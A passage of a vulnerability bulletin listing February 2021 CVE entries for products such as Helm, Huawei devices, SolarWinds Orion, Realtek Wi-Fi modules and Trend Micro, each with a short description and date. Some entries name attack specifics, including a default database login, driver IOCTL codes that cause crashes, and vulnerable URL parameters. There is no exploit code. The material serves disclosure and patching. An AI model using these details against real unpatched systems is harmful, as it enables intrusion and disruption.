  This affects all versions of package freediskspace. The vulnerability arises out of improper neutralization of arguments in line 71 of freediskspace.js. 2021-02-02 not yet calculated CVE-2020-7775
MISC gitea — gitea
  Stack buffer overflow vulnerability in gitea 1.9.0 through 1.13.1 allows remote attackers to cause a denial of service (crash) via vectors related to a file path. 2021-02-05 not yet calculated CVE-2021-3382
MISC gnome — evolution
  ** DISPUTED ** GNOME Evolution through 3.38.3 produces a “Valid signature” message for an unknown identifier on a previously trusted key because Evolution does not retrieve enough information from the GnuPG API. NOTE: third parties dispute the significance of this issue, and dispute whether Evolution is the best place to change this behavior. 2021-02-01 not yet calculated CVE-2021-3349
MISC
MISC
MISC gnome — multiple_products
  autoar-extractor.c in GNOME gnome-autoar through 0.2.4, as used by GNOME Shell, Nautilus, and other software, allows Directory Traversal during extraction because it lacks a check of whether a file’s parent is a symlink to a directory outside of the intended extraction location. 2021-02-05 not yet calculated CVE-2020-36241
MISC
MISC harbor — harbor
  In Harbor 2.0 before 2.0.5 and 2.1.x before 2.1.2 the catalog’s registry API is exposed on an unauthenticated path. 2021-02-02 not yet calculated CVE-2020-29662
MISC hcl — digital_experience
  HCL Digital Experience 9.5 containers include vulnerabilities that could expose sensitive data to unauthorized parties via crafted requests. These affect containers only. These do not affect traditional on-premise installations. 2021-02-02 not yet calculated CVE-2020-14255
CONFIRM hcl — digital_experience
  HCL Digital Experience 8.5, 9.0, and 9.5 exposes information about the server to unauthorized users. 2021-02-02 not yet calculated CVE-2020-14221
CONFIRM hcl — digital_experience
  In Digital Experience 8.5, 9.0, and 9.5, WSRP consumer is vulnerable to cross-site scripting (XSS). 2021-02-02 not yet calculated CVE-2020-4081
CONFIRM hcl — onetest_ui
  HCL OneTest UI V9.5, V10.0, and V10.1 does not perform authentication for functionality that either requires a provable user identity or consumes a significant amount of resources. 2021-02-04 not yet calculated CVE-2020-14245
MISC helm — helm
  Helm is open-source software which is essentially “The Kubernetes Package Manager”. Helm is a tool for managing Charts. Charts are packages of pre-configured Kubernetes resources. In Helm from version 3.0 and before version 3.5.2, there a few cases where data loaded from potentially untrusted sources was not properly sanitized. When a SemVer in the `version` field of a chart is invalid, in some cases Helm allows the string to be used “as is” without sanitizing. Helm fails to properly sanitized some fields present on Helm repository `index.yaml` files. Helm does not properly sanitized some fields in the `plugin.yaml` file for plugins In some cases, Helm does not properly sanitize the fields in the `Chart.yaml` file. By exploiting these attack vectors, core maintainers were able to send deceptive information to a terminal screen running the `helm` command, as well as obscure or alter information on the screen. In some cases, we could send codes that terminals used to execute higher-order logic, like clearing a terminal screen. Further, during evaluation, the Helm maintainers discovered a few other fields that were not properly sanitized when read out of repository index files. This fix remedies all such cases, and once again enforces SemVer2 policies on version fields. All users of the Helm 3 should upgrade to the fixed version 3.5.2 or later. Those who use Helm as a library should verify that they either sanitize this data on their own, or use the proper Helm API calls to sanitize the data. 2021-02-05 not yet calculated CVE-2021-21303
MISC
MISC
CONFIRM huawei — gauess100
  There is a logic vulnerability in Huawei Gauss100 OLTP Product. An attacker with certain permissions could perform specific SQL statement to exploit this vulnerability. Due to insufficient security design, successful exploit can cause service abnormal. Affected product versions include: ManageOne versions 6.5.1.1.B020, 6.5.1.1.B030, 6.5.1.1.B040, 6.5.1.SPC100.B050, 6.5.1.SPC101.B010, 6.5.1.SPC101.B040, 6.5.1.SPC200, 6.5.1.SPC200.B010, 6.5.1.SPC200.B030, 6.5.1.SPC200.B040, 6.5.1.SPC200.B050, 6.5.1.SPC200.B060, 6.5.1.SPC200.B070, 6.5.1RC1.B070, 6.5.1RC1.B080, 6.5.1RC2.B040, 6.5.1RC2.B050, 6.5.1RC2.B060, 6.5.1RC2.B070, 6.5.1RC2.B080, 6.5.1RC2.B090. 2021-02-06 not yet calculated CVE-2021-22298
CONFIRM huawei — manageone
  There has a CSV injection vulnerability in ManageOne 8.0.1. An attacker with common privilege may exploit this vulnerability through some operations to inject the CSV files. Due to insufficient input validation of some parameters, the attacker can exploit this vulnerability to inject CSV files to the target device. 2021-02-06 not yet calculated CVE-2020-9205
CONFIRM huawei — mate_30 There is a weak algorithm vulnerability in Mate 3010.0.0.203(C00E201R7P2). The protection is insufficient for the modules that should be protected. Local attackers can exploit this vulnerability to affect the integrity of certain module. 2021-02-06 not yet calculated CVE-2021-22307
CONFIRM huawei — mate_30
  Mate 30 10.0.0.203(C00E201R7P2) have a buffer overflow vulnerability. After obtaining the root permission, an attacker can exploit the vulnerability to cause buffer overflow. 2021-02-06 not yet calculated CVE-2021-22301
CONFIRM huawei — mate_30
  There is an out-of-bound read vulnerability in Mate 30 10.0.0.182(C00E180R6P2). A module does not verify the some input when dealing with messages. Attackers can exploit this vulnerability by sending malicious input through specific module. This could cause out-of-bound, compromising normal service. 2021-02-06 not yet calculated CVE-2021-22306
CONFIRM huawei — mate_30
  There is a buffer overflow vulnerability in Mate 30 10.1.0.126(C00E125R5P3). A module does not verify the some input when dealing with messages. Attackers can exploit this vulnerability by sending malicious input through specific module. This could cause buffer overflow, compromising normal service. 2021-02-06 not yet calculated CVE-2021-22305
CONFIRM huawei — multiple_products
  There is a denial of service (DoS) vulnerability in eCNS280 versions V100R005C00, V100R005C10. Due to a design defect, remote unauthorized attackers send a large number of specific messages to affected devices, causing system resource exhaustion and web application DoS. 2021-02-06 not yet calculated CVE-2021-22292
CONFIRM huawei — multiple_products
  Some Huawei products have an inconsistent interpretation of HTTP requests vulnerability. Attackers can exploit this vulnerability to cause information leak. Affected product versions include: CampusInsight versions V100R019C10; ManageOne versions 6.5.1.1, 6.5.1.SPC100, 6.5.1.SPC200, 6.5.1RC1, 6.5.1RC2, 8.0.RC2. Affected product versions include: Taurus-AL00A versions 10.0.0.1(C00E1R1P1). 2021-02-06 not yet calculated CVE-2021-22293
CONFIRM huawei — multiple_products
  There is a local privilege escalation vulnerability in some Huawei products. A local, authenticated attacker could craft specific commands to exploit this vulnerability. Successful exploitation may cause the attacker to obtain a higher privilege. Affected product versions include: ManageOne versions 6.5.0,6.5.0.SPC100.B210,6.5.1.1.B010,6.5.1.1.B020,6.5.1.1.B030,6.5.1.1.B040,6.5.1.SPC100.B050,6.5.1.SPC101.B010,6.5.1.SPC101.B040,6.5.1.SPC200,6.5.1.SPC200.B010,6.5.1.SPC200.B030,6.5.1.SPC200.B040,6.5.1.SPC200.B050,6.5.1.SPC200.B060,6.5.1.SPC200.B070,6.5.1RC1.B060,6.5.1RC2.B020,6.5.1RC2.B030,6.5.1RC2.B040,6.5.1RC2.B050,6.5.1RC2.B060,6.5.1RC2.B070,6.5.1RC2.B080,6.5.1RC2.B090,6.5.RC2.B050,8.0.0,8.0.0-LCND81,8.0.0.SPC100,8.0.1,8.0.RC2,8.0.RC3,8.0.RC3.B041,8.0.RC3.SPC100; NFV_FusionSphere versions 6.5.1.SPC23,8.0.0.SPC12; SMC2.0 versions V600R019C00,V600R019C10; iMaster MAE-M versions MAE-TOOL(FusionSphereBasicTemplate_Euler_X86)V100R020C10SPC220. 2021-02-06 not yet calculated CVE-2021-22299
CONFIRM huawei — sound_x_product
  There is an insufficient integrity check vulnerability in Huawei Sound X Product. The system does not check certain software package’s integrity sufficiently. Successful exploit could allow an attacker to load a crafted software package to the device. Affected product versions include:AIS-BW80H-00 versions 9.0.3.1(H100SP13C00),9.0.3.1(H100SP18C00),9.0.3.1(H100SP3C00),9.0.3.1(H100SP9C00),9.0.3.2(H100SP1C00),9.0.3.2(H100SP2C00),9.0.3.2(H100SP5C00),9.0.3.2(H100SP8C00),9.0.3.3(H100SP1C00). 2021-02-06 not yet calculated CVE-2020-9118
CONFIRM huawei — taurus-al00a_smartphones There is a use after free vulnerability in Taurus-AL00A 10.0.0.1(C00E1R1P1). A module may refer to some memory after it has been freed while dealing with some messages. Attackers can exploit this vulnerability by sending specific message to the affected module. This may lead to module crash, compromising normal service. 2021-02-06 not yet calculated CVE-2021-22304
CONFIRM huawei — taurus-al00a_smartphones
  There is an out-of-bound read vulnerability in Taurus-AL00A 10.0.0.1(C00E1R1P1). A module does not verify the some input. Attackers can exploit this vulnerability by sending malicious input through specific app. This could cause out-of-bound, compromising normal service. 2021-02-06 not yet calculated CVE-2021-22302
MISC huawei — taurus-al00a_smartphones
  There is a pointer double free vulnerability in Taurus-AL00A 10.0.0.1(C00E1R1P1). There is a lack of muti-thread protection when a function is called. Attackers can exploit this vulnerability by performing malicious operation to cause pointer double free. This may lead to module crash, compromising normal service. 2021-02-06 not yet calculated CVE-2021-22303
CONFIRM ibm — powerha
  IBM PowerHA 7.2 could allow a local attacker to obtain sensitive information from temporary directories after a discovery failure occurs. IBM X-Force ID: 189969. 2021-02-05 not yet calculated CVE-2020-4832
XF
CONFIRM imagemagik — magikcore/gem
  A flaw was found in ImageMagick in MagickCore/gem.c. An attacker who submits a crafted file that is processed by ImageMagick could trigger undefined behavior in the form of math division by zero. This would most likely lead to an impact to application availability, but could potentially cause other problems related to undefined behavior. This flaw affects ImageMagick versions prior to 7.0.10-56. 2021-02-06 not yet calculated CVE-2021-20176
MISC intel — bluez
  Improper buffer restrictions in BlueZ may allow an unauthenticated user to potentially enable denial of service via adjacent access. This affects all Linux kernel versions that support BlueZ. 2021-02-02 not yet calculated CVE-2020-24490
CONFIRM intel — celeron_processor_4000_series
  Out of bound read in BIOS firmware for 8th, 9th Generation Intel(R) Core(TM), Intel(R) Celeron(R) Processor 4000 Series Processors may allow an unauthenticated user to potentially enable elevation of privilege or denial of service via local access. 2021-02-02 not yet calculated CVE-2020-8672
CONFIRM iobit — advanced_systemcare
  The AscRegistryFilter.sys kernel driver in IObit Advanced SystemCare 13.2 allows an unprivileged user to send an IOCTL to the device driver. If the user provides a NULL entry for the dwIoControlCode parameter, a kernel panic (aka BSOD) follows. The IOCTL codes can be found in the dispatch function: 0x8001E000, 0x8001E004, 0x8001E008, 0x8001E00C, 0x8001E010, 0x8001E014, 0x8001E020, 0x8001E024, 0x8001E040, 0x8001E044, and 0x8001E048. DosDevicesAscRegistryFilter and DeviceAscRegistryFilter are affected. 2021-02-05 not yet calculated CVE-2020-10234
MISC
MISC
MISC jenzabar — jenzabar
  Jenzabar 9.2.x through 9.2.2 allows /ics?tool=search&query= XSS. 2021-02-06 not yet calculated CVE-2021-26723
MISC
MISC jetbrains — code_with_me
  In JetBrains Code With Me before 2020.3, an attacker on the local network, knowing a session ID, could get access to the encrypted traffic. 2021-02-03 not yet calculated CVE-2021-25755
MISC
MISC jetbrains — hub
  In JetBrains Hub before 2020.1.12629, an authenticated user can delete 2FA settings of any other user. 2021-02-03 not yet calculated CVE-2021-25759
MISC
MISC jetbrains — ktor
  In JetBrains Ktor before 1.5.0, a birthday attack on SessionStorage key was possible. 2021-02-03 not yet calculated CVE-2021-25761
MISC
MISC jetbrains — ktor
  In JetBrains Ktor before 1.4.3, HTTP Request Smuggling was possible. 2021-02-03 not yet calculated CVE-2021-25762
MISC
MISC jetbrains — youtrack
  In JetBrains YouTrack before 2020.4.4701, improper resource access checks were made. 2021-02-03 not yet calculated CVE-2021-25766
MISC
MISC lg — multiple_mobile_devices
  An issue was discovered on LG mobile devices with Android OS 8.0, 8.1, 9.0, and 10 software. In preloaded applications, the HostnameVerified default is mishandled. The LG ID is LVE-SMP-200029 (February 2021). 2021-02-04 not yet calculated CVE-2021-26687
MISC lg — wing_mobile_devices
  An issue was discovered on LG Wing mobile devices with Android OS 10 software. The biometric sensor has weak security properties. The LG ID is LVE-SMP-200030 (February 2021). 2021-02-04 not yet calculated CVE-2021-26688
MISC linkedin — oncall
  LinkedIn Oncall through 1.4.0 allows reflected XSS via /query because of mishandling of the “No results found for” message in the search bar. 2021-02-05 not yet calculated CVE-2021-26722
MISC linux — linux_kernel
  A local privilege escalation was discovered in the Linux kernel before 5.10.13. Multiple race conditions in the AF_VSOCK implementation are caused by wrong locking in net/vmw_vsock/af_vsock.c. The race conditions were implicitly introduced in the commits that added VSOCK multi-transport support. 2021-02-05 not yet calculated CVE-2021-26708
MLIST
MISC
MISC
MISC loklak — loklak
  loklak is an open-source server application which is able to collect messages from various sources, including twitter. The server contains a search index and a peer-to-peer index sharing interface. All messages are stored in an elasticsearch index. In loklak less than or equal to commit 5f48476, a path traversal vulnerability exists. Insufficient input validation in the APIs exposed by the loklak server allowed a directory traversal vulnerability. Any admin configuration and files readable by the app available on the hosted file system can be retrieved by the attacker. Furthermore, user-controlled content could be written to any admin config and files readable by the application. This has been patched in commit 50dd692. Users will need to upgrade their hosted instances of loklak to not be vulnerable to this exploit. 2021-02-02 not yet calculated CVE-2020-15097
MISC
CONFIRM max_secure — max_spyware_detector
  In Max Secure Max Spyware Detector 1.0.0.044, the driver file (MaxProc64.sys) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of not validating input values from IOCtl 0x2200019. (This also extends to the various other products from Max Secure that include MaxProc64.sys.) 2021-02-05 not yet calculated CVE-2020-12122
MISC
MISC
MISC mechanize — mechanize
  Mechanize is an open-source ruby library that makes automated web interaction easy. In Mechanize from version 2.0.0 and before version 2.7.7 there is a command injection vulnerability. Affected versions of mechanize allow for OS commands to be injected using several classes’ methods which implicitly use Ruby’s Kernel.open method. Exploitation is possible only if untrusted input is used as a local filename and passed to any of these calls: Mechanize::CookieJar#load, Mechanize::CookieJar#save_as, Mechanize#download, Mechanize::Download#save, Mechanize::File#save, and Mechanize::FileResponse#read_body. This is fixed in version 2.7.7. 2021-02-02 not yet calculated CVE-2021-21289
MISC
MISC
CONFIRM
MISC micro_focus — application_performance_management
  Persistent Cross-Site scripting vulnerability in Micro Focus Application Performance Management product, affecting versions 9.40, 9.50 and 9.51. The vulnerability could allow persistent XSS attack. 2021-02-06 not yet calculated CVE-2021-22499
CONFIRM micro_focus — application_performance_management
  Cross Site Request Forgery vulnerability in Micro Focus Application Performance Management product, affecting versions 9.40, 9.50 and 9.51. The vulnerability could be exploited by attacker to trick the users into executing actions of the attacker’s choosing. 2021-02-06 not yet calculated CVE-2021-22500
CONFIRM nessus — ami
  Nessus AMI versions 8.12.0 and earlier were found to either not validate, or incorrectly validate, a certificate which could allow an attacker to spoof a trusted entity by using a man-in-the-middle (MITM) attack. 2021-02-06 not yet calculated CVE-2020-5812
MISC netgear — r7450_routers
  This vulnerability allows network-adjacent attackers to disclose sensitive information on affected installations of NETGEAR R7450 1.2.0.62_1.0.1 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the SOAP API endpoint, which listens on TCP port 80 by default. The issue results from the lack of proper access control. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Was ZDI-CAN-11559. 2021-02-04 not yet calculated CVE-2020-27873
N/A
N/A netgear — r7450_routers
  This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of NETGEAR R7450 1.2.0.62_1.0.1 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the mini_httpd service, which listens on TCP port 80 by default. The issue results from improper state tracking in the password recovery process. An attacker can leverage this in conjunction with other vulnerabilities to execute code in the context of root. Was ZDI-CAN-11365. 2021-02-04 not yet calculated CVE-2020-27872
N/A
N/A new_media — smarty
  An issue was discovered in New Media Smarty before 9.10. Passwords are stored in the database in an obfuscated format that can be easily reversed. The file data.mdb contains these obfuscated passwords in the second column. NOTE: this is unrelated to the popular Smarty template engine product. 2021-02-05 not yet calculated CVE-2020-10375
MISC
MISC npm — npm
  This affects all versions of package decal. The vulnerability is in the extend function. 2021-02-04 not yet calculated CVE-2020-28450
MISC
MISC
MISC npm — npm
  This affects all versions of package decal. The vulnerability is in the set function. 2021-02-04 not yet calculated CVE-2020-28449
MISC
MISC
MISC nvidia — geforce_experience
  NVIDIA GeForce Experience, all versions prior to 3.21, contains a vulnerability in GameStream (rxdiag.dll) where an arbitrary file deletion due to improper handling of log files may lead to denial of service. 2021-02-05 not yet calculated CVE-2021-1072
CONFIRM oauth2_proxy — oauth2_proxy
  OAuth2 Proxy is an open-source reverse proxy and static file server that provides authentication using Providers (Google, GitHub, and others) to validate accounts by email, domain or group. In OAuth2 Proxy before version 7.0.0, for users that use the whitelist domain feature, a domain that ended in a similar way to the intended domain could have been allowed as a redirect. For example, if a whitelist domain was configured for “.example.com”, the intention is that subdomains of example.com are allowed. Instead, “example.com” and “badexample.com” could also match. This is fixed in version 7.0.0 onwards. As a workaround, one can disable the whitelist domain feature and run separate OAuth2 Proxy instances for each subdomain. 2021-02-02 not yet calculated CVE-2021-21291
MISC
MISC
CONFIRM
MISC october — october
  An issue was discovered in October through build 471. It reactivates an old session ID (which had been invalid after a logout) once a new login occurs. NOTE: this violates the intended Auth/Manager.php authentication behavior but, admittedly, is only relevant if an old session ID is known to an attacker. 2021-02-05 not yet calculated CVE-2021-3311
CONFIRM
MISC opmantek — open-audit
  Opmantek Open-AudIT 4.0.1 is affected by cross-site scripting (XSS). When outputting SQL statements for debugging, a maliciously crafted query can trigger an XSS attack. This attack only succeeds if the user is already logged in to Open-AudIT before they click the malicious link. 2021-02-05 not yet calculated CVE-2021-3333
MISC oppo — android_phone_with_mtk_chipset
  OPPO Android Phone with MTK chipset and Android 8.1/9/10/11 versions have an information leak vulnerability. The “adb shell getprop ro.vendor.aee.enforcing” or “adb shell getprop ro.vendor.aee.enforcing” return no. 2021-02-06 not yet calculated CVE-2020-11836
MISC pdf2json — pdf2json
  Buffer overflow in pdf2json 0.69 allows local users to execute arbitrary code by converting a crafted PDF file. 2021-02-05 not yet calculated CVE-2020-18750
CONFIRM
MISC podman — podman
  Rootless containers run with Podman, receive all traffic with a source IP address of 127.0.0.1 (including from remote hosts). This impacts containerized applications that trust localhost (127.0.01) connections by default and do not require authentication. This issue affects Podman 1.8.0 onwards. 2021-02-02 not yet calculated CVE-2021-20199
MISC
MISC
MISC
MISC polr — polr
  Polr is an open source URL shortener. in Polr before version 2.3.0, a vulnerability in the setup process allows attackers to gain admin access to site instances, even if they do not possess an existing account. This vulnerability exists regardless of users’ settings. If an attacker crafts a request with specific cookie headers to the /setup/finish endpoint, they may be able to obtain admin privileges on the instance. This is caused by a loose comparison (==) in SetupController that is susceptible to attack. The project has been patched to ensure that a strict comparison (===) is used to verify the setup key, and that /setup/finish verifies that no users table exists before performing any migrations or provisioning any new accounts. This is fixed in version 2.3.0. Users can patch this vulnerability without upgrading by adding abort(404) to the very first line of finishSetup in SetupController.php. 2021-02-01 not yet calculated CVE-2021-21276
MISC
MISC
CONFIRM pretashop — opart_devis
  An Insecure Direct Object Reference (IDOR) vulnerability was found in Prestashop Opart devis < 4.0.2. Unauthenticated attackers can have access to any user’s invoice and delivery address by exploiting an IDOR on the delivery_address and invoice_address fields. 2021-02-04 not yet calculated CVE-2020-16194
MISC psyprax — psyprax
  An issue was discovered in Psyprax before 3.2.2. The Firebird database is accessible with the default user sysdba and password masterke after installation. This allows any user to access it and read and modify the contents, including passwords. Local database files can be accessed directly as well. 2021-02-05 not yet calculated CVE-2020-10552
MISC psyprax — psyprax
  An issue was discovered in Psyprax before 3.2.2. The file %PROGRAMDATA%Psyprax32PPScreen.ini contains a hash for the lockscreen (aka screensaver) of the application. If that entry is removed, the lockscreen is no longer displayed and the app is no longer locked. All local users are able to modify that file. 2021-02-05 not yet calculated CVE-2020-10553
MISC psyprax — psyprax
  An issue was discovered in Psyprax beforee 3.2.2. Passwords used to encrypt the data are stored in the database in an obfuscated format, which can be easily reverted. For example, the password AAAAAAAA is stored in the database as MMMMMMMM. 2021-02-05 not yet calculated CVE-2020-10554
MISC question2answer — q2a
  Question2Answer Q2A Ultimate SEO Version 1.3 is affected by cross-site scripting (XSS), which may lead to arbitrary remote code execution. 2021-02-05 not yet calculated CVE-2021-3258
MISC
MISC
MISC realtek — rtl8195a_wi-fi_module The function ClientEAPOLKeyRecvd() in the Realtek RTL8195A Wi-Fi Module prior to versions released in April 2020 (up to and excluding 2.08) does not validate the size parameter for an rtl_memcpy() operation, resulting in a stack buffer overflow which can be exploited for denial of service. An attacker can impersonate an Access Point and attack a vulnerable Wi-Fi client, by injecting a crafted packet into the WPA2 handshake. The attacker does not need to know the network’s PSK. 2021-02-03 not yet calculated CVE-2020-25857
CONFIRM realtek — rtl8195a_wi-fi_module
  The function AES_UnWRAP() in the Realtek RTL8195A Wi-Fi Module prior to versions released in April 2020 (up to and excluding 2.08) does not validate the size parameter for a memcpy() operation, resulting in a stack buffer overflow which can be exploited for remote code execution or denial of service. An attacker can impersonate an Access Point and attack a vulnerable Wi-Fi client, by injecting a crafted packet into the WPA2 handshake. The attacker needs to know the network’s PSK in order to exploit this. 2021-02-03 not yet calculated CVE-2020-25855
CONFIRM realtek — rtl8195a_wi-fi_module
  The function CheckMic() in the Realtek RTL8195A Wi-Fi Module prior to versions released in April 2020 (up to and excluding 2.08) does not validate the size parameter for an internal function, _rt_md5_hmac_veneer() or _rt_hmac_sha1_veneer(), resulting in a stack buffer over-read which can be exploited for denial of service. An attacker can impersonate an Access Point and attack a vulnerable Wi-Fi client, by injecting a crafted packet into the WPA2 handshake. The attacker does not need to know the network’s PSK. 2021-02-03 not yet calculated CVE-2020-25853
CONFIRM realtek — rtl8195a_wi-fi_module
  The function DecWPA2KeyData() in the Realtek RTL8195A Wi-Fi Module prior to versions released in April 2020 (up to and excluding 2.08) does not validate the size parameter for an rtl_memcpy() operation, resulting in a stack buffer overflow which can be exploited for remote code execution or denial of service. An attacker can impersonate an Access Point and attack a vulnerable Wi-Fi client, by injecting a crafted packet into the WPA2 handshake. The attacker needs to know the network’s PSK in order to exploit this. 2021-02-03 not yet calculated CVE-2020-25856
CONFIRM realtek — rtl8195a_wi-fi_module
  The function DecWPA2KeyData() in the Realtek RTL8195A Wi-Fi Module prior to versions released in April 2020 (up to and excluding 2.08) does not validate the size parameter for an internal function, rt_arc4_crypt_veneer() or _AES_UnWRAP_veneer(), resulting in a stack buffer overflow which can be exploited for remote code execution or denial of service. An attacker can impersonate an Access Point and attack a vulnerable Wi-Fi client, by injecting a crafted packet into the WPA2 handshake. The attacker needs to know the network’s PSK in order to exploit this. 2021-02-03 not yet calculated CVE-2020-25854
CONFIRM red_hat — red_hat
  A flaw was found in the default configuration of dnsmasq, as shipped with Fedora versions prior to 31 and in all versions Red Hat Enterprise Linux, where it listens on any interface and accepts queries from addresses outside of its local subnet. In particular, the option `local-service` is not enabled. Running dnsmasq in this manner may inadvertently make it an open resolver accessible from any address on the internet. This flaw allows an attacker to conduct a Distributed Denial of Service (DDoS) against other systems. 2021-02-06 not yet calculated CVE-2020-14312
MISC redwood — report2web
  A cross-site scripting (XSS) issue in the login panel in Redwood Report2Web 4.3.4.5 and 4.5.3 allows remote attackers to inject JavaScript via the signIn.do urll parameter. 2021-02-05 not yet calculated CVE-2021-26710
MISC redwood — report2web
  A frame-injection issue in the online help in Redwood Report2Web 4.3.4.5 allows remote attackers to render an external resource inside a frame via the help/Online_Help/NetHelp/default.htm turl parameter. 2021-02-05 not yet calculated CVE-2021-26711
MISC softmaker — office_planmaker
  An exploitable integer overflow vulnerability exists in the PlanMaker document parsing functionality of SoftMaker Office 2021’s PlanMaker application. A specially crafted document can cause the document parser perform arithmetic that may overflow which can result in an undersized heap allocation. Later when copying data from the file into this allocation, a heap-based buffer overflow will occur which can corrupt memory. These types of memory corruptions can allow for code execution under the context of the application. An attacker can entice the victim to open a document to trigger this vulnerability. 2021-02-04 not yet calculated CVE-2020-13579
MISC softmaker — office_planmaker
  A memory corruption vulnerability exists in the Excel Document SST Record 0x00fc functionality of SoftMaker Software GmbH SoftMaker Office PlanMaker 2021 (Revision 1014). A specially crafted malformed file can lead to a heap buffer overflow. An attacker can provide a malicious file to trigger this vulnerability. 2021-02-04 not yet calculated CVE-2020-13586
MISC softmaker — office_planmaker
  A specially crafted document can cause the document parser to copy data from a particular record type into a static-sized buffer within an object that is smaller than the size used for the copy, which will cause a heap-based buffer overflow. In version/Instance 0x0004 and 0x0015, an attacker can entice the victim to open a document to trigger this vulnerability. This affects SoftMaker Software GmbH SoftMaker Office PlanMaker 2021 (Revision 1014). 2021-02-04 not yet calculated CVE-2020-27249
MISC softmaker — office_planmaker
  A specially crafted document can cause the document parser to copy data from a particular record type into a static-sized buffer within an object that is smaller than the size used for the copy, which will cause a heap-based buffer overflow. In version/Instance 0x0003 and 0x0014, an attacker can entice the victim to open a document to trigger this vulnerability. This affects SoftMaker Software GmbH SoftMaker Office PlanMaker 2021 (Revision 1014). 2021-02-04 not yet calculated CVE-2020-27248
MISC softmaker — office_planmaker
  A specially crafted document can cause the document parser to copy data from a particular record type into a static-sized buffer within an object that is smaller than the size used for the copy, which will cause a heap-based buffer overflow. In version/Instance 0x0002, an attacker can entice the victim to open a document to trigger this vulnerability. This affects SoftMaker Software GmbH SoftMaker Office PlanMaker 2021 (Revision 1014). 2021-02-04 not yet calculated CVE-2020-27247
MISC softmaker — office_planmaker
  An exploitable heap-based buffer overflow vulnerability exists in the PlanMaker document parsing functionality of SoftMaker Office 2021’s PlanMaker application. A specially crafted document can cause the document parser to explicitly trust a length from a particular record type and use it to write a 16-bit null relative to a buffer allocated on the stack. Due to a lack of bounds-checking on this value, this can allow an attacker to write to memory outside of the buffer and controllably corrupt memory. This can allow an attacker to earn code execution under the context of the application. An attacker can entice the victim to open a document to trigger this vulnerability. 2021-02-04 not yet calculated CVE-2020-13580
MISC solarwinds — orion_platform SolarWinds Orion Platform before 2020.2.4, as used by various SolarWinds products, installs and uses a SQL Server backend, and stores database credentials to access this backend in a file readable by unprivileged users. As a result, any user having access to the filesystem can read database login details from that file, including the login name and its associated password. Then, the credentials can be used to get database owner access to the SWNetPerfMon.DB database. This gives access to the data collected by SolarWinds applications, and leads to admin access to the applications by inserting or changing authentication data stored in the Accounts table of the database. 2021-02-03 not yet calculated CVE-2021-25275
MISC solarwinds — orion_platform
  The Collector Service in SolarWinds Orion Platform before 2020.2.4 uses MSMQ (Microsoft Message Queue) and doesn’t set permissions on its private queues. As a result, remote unauthenticated clients can send messages to TCP port 1801 that the Collector Service will process. Additionally, upon processing of such messages, the service deserializes them in insecure manner, allowing remote arbitrary code execution as LocalSystem. 2021-02-03 not yet calculated CVE-2021-25274
MISC solarwinds — serv-u In SolarWinds Serv-U before 15.2.2 Hotfix 1, there is a directory containing user profile files (that include users’ password hashes) that is world readable and writable. An unprivileged Windows user (having access to the server’s filesystem) can add an FTP user by copying a valid profile file to this directory. For example, if this profile sets up a user with a C: home directory, then the attacker obtains access to read or replace arbitrary files with LocalSystem privileges. 2021-02-03 not yet calculated CVE-2021-25276
MISC sonicwall — sslvpn_sma100
  A SQL-Injection vulnerability in the SonicWall SSLVPN SMA100 product allows a remote unauthenticated attacker to perform SQL query to access username password and other session related information. This vulnerability impacts SMA100 build version 10.x. 2021-02-04 not yet calculated CVE-2021-20016
CONFIRM squaredup — squaredup
  CSRF protection was not present in SquaredUp before version 4.6.0. A CSRF attack could have been possible by an administrator executing arbitrary code in a HTML dashboard tile via a crafted HTML page, or by uploading a malicious SVG payload into a dashboard. 2021-02-03 not yet calculated CVE-2020-9388
CONFIRM tibco — ebx_web_server
  The TIBCO EBX Web Server component of TIBCO Software Inc.’s TIBCO EBX contains a vulnerability that theoretically allows a low privileged attacker with network access to execute a Stored Cross Site Scripting (XSS) attack on the affected system. Affected releases are TIBCO Software Inc.’s TIBCO EBX: versions 5.9.12 and below. 2021-02-02 not yet calculated CVE-2021-23271
CONFIRM
CONFIRM traccar — traccar
  Traccar is an open source GPS tracking system. In Traccar before version 4.12 there is an unquoted Windows binary path vulnerability. Only Windows versions are impacted. Attacker needs write access to the filesystem on the host machine. If Java path includes a space, then attacker can lift their privilege to the same as Traccar service (system). This is fixed in version 4.12. 2021-02-02 not yet calculated CVE-2021-21292
MISC
CONFIRM
MISC trend_micro — antivirus_for_mac_2021
  Trend Micro Antivirus for Mac 2021 (Consumer) is vulnerable to a memory exhaustion vulnerability that could lead to disabling all the scanning functionality within the application. Please note: an attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability – i.e. the attacker must already have access to the target system (either legitimately or via another exploit). 2021-02-04 not yet calculated CVE-2021-25227
N/A
N/A trend_micro — apex_one
  An improper access control vulnerability in Trend Micro Apex One (on-prem and SaaS) and OfficeScan XG SP1 could allow an unauthenticated user to obtain information about the database server. 2021-02-04 not yet calculated CVE-2021-25229
N/A
N/A
N/A trend_micro — apex_one
  An improper access control vulnerability in Trend Micro Apex One (on-prem and SaaS), OfficeScan XG SP1, and Worry-Free Business Security 10.0 SP1 could allow an unauthenticated user to obtain information about hotfix history. 2021-02-04 not yet calculated CVE-2021-25228
N/A
N/A
N/A
N/A trend_micro — worry-free_business_security
  An improper access control vulnerability in Worry-Free Business Security 10.0 SP1 could allow an unauthenticated user to obtain various pieces of settings informaiton. 2021-02-04 not yet calculated CVE-2021-25245
N/A
N/A trend_micro — worry-free_business_security
  An improper access control vulnerability in Worry-Free Business Security 10.0 SP1 could allow an unauthenticated user to obtain various pieces of configuration informaiton. 2021-02-04 not yet calculated CVE-2021-25244
N/A
N/A typora — typora
  An issue was discovered in Typora 0.9.67. There is an XSS vulnerability that causes Remote Code Execution. 2021-02-05 not yet calculated CVE-2020-18737
MISC video_insight — vms
  Video Insight VMS versions prior to 7.8 allows a remote attacker to execute arbitrary code with the system user privilege by sending a specially crafted request. 2021-02-05 not yet calculated CVE-2021-20623
MISC
MISC whatsapp — whatsapp
  A missing bounds check in WhatsApp for Android prior to v2.21.1.13 and WhatsApp Business for Android prior to v2.21.1.13 could have allowed out-of-bounds read and write if a user applied specific image filters to a specially crafted image and sent the resulting image. 2021-02-02 not yet calculated CVE-2020-1910
CONFIRM wordpress — wordpress
